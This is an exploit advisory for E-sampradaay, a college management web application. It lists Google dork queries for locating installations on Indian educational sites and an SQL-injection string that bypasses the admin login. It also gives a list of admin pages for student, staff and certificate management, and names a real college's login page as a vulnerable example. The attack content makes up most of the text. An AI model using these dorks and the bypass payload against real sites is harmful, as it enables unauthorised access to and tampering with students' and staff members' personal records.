#################################################################################################
# Exploit Title : Vibrant Hardware and Software Solutions E-sampradaay Improper Authorization Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 09/11/2018
# Vendor Homepage : vibrantitsolutions.com
# Tested On : Windows and Linux
# Category : WebApps
# Google Dork :
intext:''Designed by Vibrant Hardware and Software Solutions'' site:edu.in
intext:''Designed : College ICT Laboratory'' site:edu.in
intext:''COPYRIGHT © 2016 VPCCECM & DEVELOPED BY VPC ICT LAB'' site:edu.in
intext:''© Copyright 2010 Vibrant IT Solutions Pvt. Ltd. All rights reserved.''
# Exploit Risk : Medium
# CWE : CWE-592 [ Authentication Bypass Issues ] CWE-284 [ Improper Access Control ] CWE-285 [ Improper Authorization ]
#################################################################################################
# Admin Panel Login Path :
/esampradaay/admin_login.php
Admin Username : anything' OR 'x'='x
Admin Password : anything' OR 'x'='x
/esampradaay/admin_dashboard.php
/esampradaay/vidya_teaching_staff.php
/esampradaay/vidya_staff_register.php
/esampradaay/student_registration.php
/esampradaay/Parent_registration.php
/esampradaay/Management_register.php
/esampradaay/Alumini_Register.php
/esampradaay/student_attendance_menu.php
/esampradaay/student_attendance_upload.php
/esampradaay/dailycwreportAdmin.php
/esampradaay/staff_attendance_menu.php
/esampradaay/class.php
/esampradaay/eventmenu.php
/esampradaay/admin_menu.php
/esampradaay/addRollNum.php
/esampradaay/delete_student.php
/esampradaay/circular_upload.php
/esampradaay/certificate_upload.php
/esampradaay/cirview.php
/esampradaay/update_student.php
/esampradaay/staff_login.php
/esampradaay/update_nonteaching.php
#################################################################################################
# Example Vulnerable Site =>
[+] vidyaprabodhinicollege.edu.in/esampradaay/admin_login.php
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################